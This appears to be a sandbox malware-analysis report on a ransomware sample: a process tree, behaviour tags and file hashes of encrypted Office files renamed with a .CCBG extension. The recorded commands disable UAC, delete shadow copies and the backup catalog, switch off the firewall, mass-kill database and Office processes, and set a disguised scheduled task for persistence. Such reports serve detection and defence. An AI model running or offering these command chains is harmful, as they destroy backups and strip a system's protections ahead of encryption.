C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵PID:1936
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:1660
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:1332
-
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵PID:1484
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:608
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:1964
-
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵PID:432
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:1044
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 90 /nobreak5⤵
- Delays execution with timeout.exe
PID:1068
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f3⤵
- Creates scheduled task(s)
PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo %date%-%time%2⤵PID:1712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"2⤵
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:1872
-
-
C:\Windows\SysWOW64\find.exefind /i "os name"3⤵PID:1268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "original"2⤵PID:1084
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:1744
-
-
C:\Windows\SysWOW64\find.exefind /i "original"3⤵PID:1076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵PID:1556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com2⤵PID:1352
-
C:\Windows\SysWOW64\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com3⤵PID:1992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet2⤵PID:1752
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Modifies registry key
PID:764
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:1432
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1128
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵PID:524
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵PID:1624
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule group="Network Discovery" new enable=Yes3⤵PID:652
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe2⤵PID:824
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msftesql.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlagent.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlbrowser.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2044
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlservr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:884
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlwriter.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im oracle.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocssd.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbsnmp.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im synctime.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopqos.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im isqlplussvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:652
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im xfssvccon.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:820
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopservice.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocautoupds.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im encsvc.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:388
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im firefoxconfig.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:844
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im tbirdconfig.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocomm.exe3⤵PID:1756
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld.exe3⤵
- Kills process with taskkill
PID:524
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-nt.exe3⤵
- Kills process with taskkill
PID:1944
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-opt.exe3⤵
- Kills process with taskkill
PID:980
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbeng50.exe3⤵
- Kills process with taskkill
PID:1740
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqbcoreservice.exe3⤵
- Kills process with taskkill
PID:1636
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im excel.exe3⤵PID:432
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im infopath.exe3⤵
- Kills process with taskkill
PID:2044
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msaccess.exe3⤵
- Kills process with taskkill
PID:884
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mspub.exe3⤵
- Kills process with taskkill
PID:1196
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im onenote.exe3⤵PID:1352
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im outlook.exe3⤵PID:2012
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im powerpnt.exe3⤵
- Kills process with taskkill
PID:1972
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im steam.exe3⤵PID:1696
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat.exe3⤵PID:1712
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat64.exe3⤵
- Kills process with taskkill
PID:752
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thunderbird.exe3⤵
- Kills process with taskkill
PID:1176
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im visio.exe3⤵
- Kills process with taskkill
PID:856
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winword.exe3⤵
- Kills process with taskkill
PID:1636
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im wordpad.exe3⤵
- Kills process with taskkill
PID:1276
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /im notepad.exe2⤵PID:1944
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im notepad.exe3⤵
- Kills process with taskkill
PID:544
-
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Read_Me!_.txt2⤵PID:1608
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Read_Me!_.txt2⤵PID:824
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1096
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read_Me!_.txt1⤵PID:1124
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe"1⤵
- Executes dropped EXE
- Deletes itself
- Drops startup file
- Drops desktop.ini file(s)
PID:844 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"2⤵PID:1656
-
C:\Windows\SysWOW64\tasklist.exetasklist /v /fo csv3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
PID:1740
-
-
C:\Windows\SysWOW64\findstr.exefindstr /i "dcdcf"3⤵PID:1604
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /PID 112", /f2⤵PID:1912
-
C:\Windows\SysWOW64\taskkill.exetaskkill /PID 112", /f3⤵
- Kills process with taskkill
PID:884
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵PID:1484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat2⤵PID:2020
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"3⤵PID:1572
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat4⤵PID:608
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\h4_svc.bat" "4⤵PID:1940
-
C:\Windows\SysWOW64\tasklist.exetasklist /v5⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
PID:1044
-
-
C:\Windows\SysWOW64\find.exefind /I /c "dcdcf"5⤵PID:1628
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f2⤵PID:1592
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f3⤵
- Creates scheduled task(s)
PID:1968
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet2⤵PID:1932
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:1964
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵PID:1660
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵PID:1604
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵PID:884
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule group="Network Discovery" new enable=Yes3⤵PID:2004
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe2⤵PID:1968
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msftesql.exe3⤵PID:1592
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlagent.exe3⤵PID:1928
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlbrowser.exe3⤵
- Kills process with taskkill
PID:1064
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlservr.exe3⤵
- Kills process with taskkill
PID:1180
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlwriter.exe3⤵
- Kills process with taskkill
PID:1488
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im oracle.exe3⤵
- Kills process with taskkill
PID:1052
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocssd.exe3⤵
- Kills process with taskkill
PID:2008
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbsnmp.exe3⤵
- Kills process with taskkill
PID:1388
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im synctime.exe3⤵PID:856
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe3⤵PID:2004
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopqos.exe3⤵
- Kills process with taskkill
PID:1980
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im isqlplussvc.exe3⤵
- Kills process with taskkill
PID:608
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im xfssvccon.exe3⤵
- Kills process with taskkill
PID:960
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopservice.exe3⤵
- Kills process with taskkill
PID:1956
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocautoupds.exe3⤵
- Kills process with taskkill
PID:1792
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe3⤵
- Kills process with taskkill
PID:320
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im encsvc.exe3⤵
- Kills process with taskkill
PID:1364
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im firefoxconfig.exe3⤵PID:1268
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im tbirdconfig.exe3⤵
- Kills process with taskkill
PID:1388
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocomm.exe3⤵
- Kills process with taskkill
PID:856
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld.exe3⤵
- Kills process with taskkill
PID:2004
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-nt.exe3⤵
- Kills process with taskkill
PID:1980
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-opt.exe3⤵
- Kills process with taskkill
PID:608
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbeng50.exe3⤵
- Kills process with taskkill
PID:960
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqbcoreservice.exe3⤵
- Kills process with taskkill
PID:1956
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im excel.exe3⤵
- Kills process with taskkill
PID:1792
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im infopath.exe3⤵PID:320
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msaccess.exe3⤵
- Kills process with taskkill
PID:1364
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mspub.exe3⤵
- Kills process with taskkill
PID:1268
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im onenote.exe3⤵
- Kills process with taskkill
PID:1388
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im outlook.exe3⤵
- Kills process with taskkill
PID:856
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im powerpnt.exe3⤵
- Kills process with taskkill
PID:2004
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im steam.exe3⤵
- Kills process with taskkill
PID:1980
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat.exe3⤵
- Kills process with taskkill
PID:608
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat64.exe3⤵
- Kills process with taskkill
PID:960
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thunderbird.exe3⤵
- Kills process with taskkill
PID:1956
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im visio.exe3⤵
- Kills process with taskkill
PID:1792
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winword.exe3⤵
- Kills process with taskkill
PID:1776
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im wordpad.exe3⤵PID:1360
-
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f1⤵
- Modifies registry key
PID:1992
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5fc405ed23b70ee3e5cc59470f58aa78e
SHA14ad3f0f3e67dd3f183f0504d66057b32270fbecc
SHA256346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d
SHA512622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562
-
Filesize
1KB
MD5fc405ed23b70ee3e5cc59470f58aa78e
SHA14ad3f0f3e67dd3f183f0504d66057b32270fbecc
SHA256346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d
SHA512622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562
-
Filesize
1KB
MD5fc405ed23b70ee3e5cc59470f58aa78e
SHA14ad3f0f3e67dd3f183f0504d66057b32270fbecc
SHA256346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d
SHA512622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562
-
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\OWOW64WW.cab[[email protected]].CCBG
Filesize22.8MB
MD5ca684ab780779995446dff3ded5272cf
SHA1684045a411c8cb4ed226fe128155dee41eb8d1f8
SHA256d8704d97354d84b2ef6ec6b1033a05e083145c3b84333aa20baa407f3c1d5ff7
SHA51217b2ebd3691c31593cab0afb7923dcbf1e8bc9354f146ca0cd4b8a80ceceeb14ccfa10b929cdc568bc66e832dfcc6ac197002aa74d9a337ed21cbd7e85e719a2
-
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.msi[[email protected]].CCBG
Filesize2.9MB
MD5499c3fe39287dc8c3900f14264465fc7
SHA1724619131dd0e4ab3f1badaf7f74a53cd7c26b04
SHA256c7ab4e83a1e3e0de02bc0998585c918c859292401f9a4f4fde1dcd0c6ac0338d
SHA512afab6a6bd0f89b82b20ea53784e78b5c424329c5f98dd6a3826ab526931cb8798a36fb75bace0cbe4a06ee1813f5271a7e10285eadeb261a8d9b3592b7d33d97
-
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.xml[[email protected]].CCBG
Filesize4KB
MD5e1bf2f254f17e549d545ba5a7aa81b80
SHA1a368b571d95146189ece339ab434d21d1dfe6266
SHA2568f86115bf95dc60080392a4af38a845e6f3a0aaa6e275141ab92bd6f34cdd599
SHA512b22120a9908f8e9303f1c9a88d25389db961aa50e1a20cb3d736148c3d2602a73df6e952a55d3bef8bdd7212850b2e482edf37f1c4ffb88184a73c19f5400cac
-
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.msi[[email protected]].CCBG
Filesize23.7MB
MD5ad9d1d2ef5f214f6112930ade173de07
SHA1beb3be3dcc8e6b47c9cf2225a0fd2568d11a68c0
SHA256bff2d36d0b213b0d9fc85ec65a6439c06166b9c71ec3951bc6c46a710b34c1bd
SHA5123098742a96568048a1ef9fca62f1d5eb84a8a136e60785bb7bc691013d671ac680badb5de74452c62e61f1c3344b34e634c8c115b73922ae74b1cb6680a2fccc
-
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml[[email protected]].CCBG
Filesize17KB
MD5552556a94f9200d67b05c84aa163927f
SHA1f2dab95befcb11fde699cc1f351e096a960dd48d
SHA25647ce33f061c80684a684c33da3e1971351fe9e4115e26fbc89e22aa37d106cdf
SHA51282da918c04e4e03c763d9506082cae97f39b0d9d742d883921439e9f95d9f0299665d9fa492dad02d5a5636403ff5a6e206eae99a816f71c03f4b47102bdf93d
-
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPsWW.cab[[email protected]].CCBG
Filesize32.1MB
MD5bb18ecf9fb3fbb0f675f016291e60cdd
SHA12a7a31bfc6f8acf99e9802e978b98b88ec7c54e7
SHA256e6658daf0b1dcb13c7ba0ff3aa7237cbe75330f13c07fd21c1ddd927ca65e0b1
SHA51247dbd636ed27267e666e471148bd2b87717acf2f3188e99d9d6d283fcbbbdf1fe0dd5a49e778a8d9497bac78bc62d623773c88529e061b5a566ad39656f209cd
-
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPsWW2.cab[[email protected]].CCBG
Filesize34.0MB
MD5aef5bebf2150c1f57c26dd7454037dc1
SHA11b3f73d49d672e2024a27cb36bece9819608fd11
SHA256758ef1865b8794fa5efb329bfd0e8e2d8c2ba17466b6457bfc1ca82ee4e45463
SHA512b07f0cea6db802365e24ae615fe2da5fa381f7483965df9656d1910b6c5c73b4b13efce06ee7eb261d6a00e6308f77a13e583bc56da30a1e0c273cda7134c38a
-
Filesize
1KB
MD5fc405ed23b70ee3e5cc59470f58aa78e
SHA14ad3f0f3e67dd3f183f0504d66057b32270fbecc
SHA256346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d
SHA512622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562
-
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Setup.xml[[email protected]].CCBG
Filesize31KB
MD590472d2b77a6f03ec86e5ef19d250be9
SHA1e19408ac7368bcf31372a095e479fb9e92e9d89d
SHA2567fc2cbe2b70e22c052fb7af859a6d1d35f33a62dc83c69c1d84ffdd3d628b8ed
SHA51267241e9235e394c3cbe0cd77432fbd2d25e8d372580f266625b7650ffccc02a975143287c55632a9b0f7429166824d9cea797a7653c1acfbd43b3d9c48390c31
-
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\pkeyconfig-office.xrm-ms[[email protected]].CCBG
Filesize699KB
MD5920efa6c7a742b9977bf6ce53b69e67b
SHA1d5feb07a317e49c5f6d5db128f8613706a515f57
SHA256b5b1f0656a8e01074917f2ae55171d495b61875a995c57987a931dbd4608f134
SHA5126f1b897b561d96979c0a549c2810204832774575c4d441af8e4999fe770a2b65b3c7b9ac46a44c7644fa23e3459004e66df5ab8a996800f79d1d5d80dd72648c
-
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelLR.cab[[email protected]].CCBG
Filesize16.1MB
MD584ca73c27ef407507db057640b898d98
SHA17a3ffe972e9bd450b64ce3187dedc7fe5491518a
SHA2568c20ef7cd58bd26350eb3db1f4cbd85765ba1856f52bc08ac8c8d4f4c475bdd5
SHA512b5e6317cffa640caf167ba7bfb12236b724be5a9a5a2699e35b3923557b8c80d8a100b9e63579a79c2c819f6adef218652fd812921fcadeb237f577cc64aec67
-
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.msi[[email protected]].CCBG
Filesize1.7MB
MD53167342eff58316080f8c9eb3fc22bd1
SHA11b95392029457933e37d7d7984c62a7cce1f63b0
SHA256d9d4a5ff5a9b9e9aecc30ed374e0f169a038eb7cbb51c08ed01d69db7b880227
SHA512d1c205c1e6693c5b0d6a6c337b54184964a54a2be16ba6c058ac116cec9fd858c20915357fc72decb27ff6e6fb1c7d2c20aa21fa0d86d41e631b3d9d0a24d235
-
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.xml[[email protected]].CCBG
Filesize1KB
MD5df2ee96dbef2b749c00bd52e0dc9de7e
SHA1f80ea218bb428140e8a7074863926a0c187c3a13
SHA2567ce647694bc17aa73cd24dcdb73c23b72560ca8cff5829770eb461797512f04b
SHA512f53cf42c1b24857a0a66febe3a98c6594067e811ad00666fa3468ea614ddfd8a2177588a5a179bcbc4097f1be40dab93fa3702f58644772b649d6f6267fb60b6
-
Filesize
1KB
MD5fc405ed23b70ee3e5cc59470f58aa78e
SHA14ad3f0f3e67dd3f183f0504d66057b32270fbecc
SHA256346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d
SHA512622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562
-
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Setup.xml[[email protected]].CCBG
Filesize2KB
MD550face27797079e44518a4dc8b866a4f
SHA11d098a67d0b6657cffc4ebe2b30ecc8f75815093
SHA256b978b54d3c4eb80b899c3d69bf2c03465c9011889918522eaf9a8482f91c8e36
SHA512b59be5e59ab595d79b13efe58791677b2e7f2231f216827911e74c9ac72130cf6678999bd310856bf22f0505cecd2e60d11e59f12a47e5874a02c02b4d9a1171
-
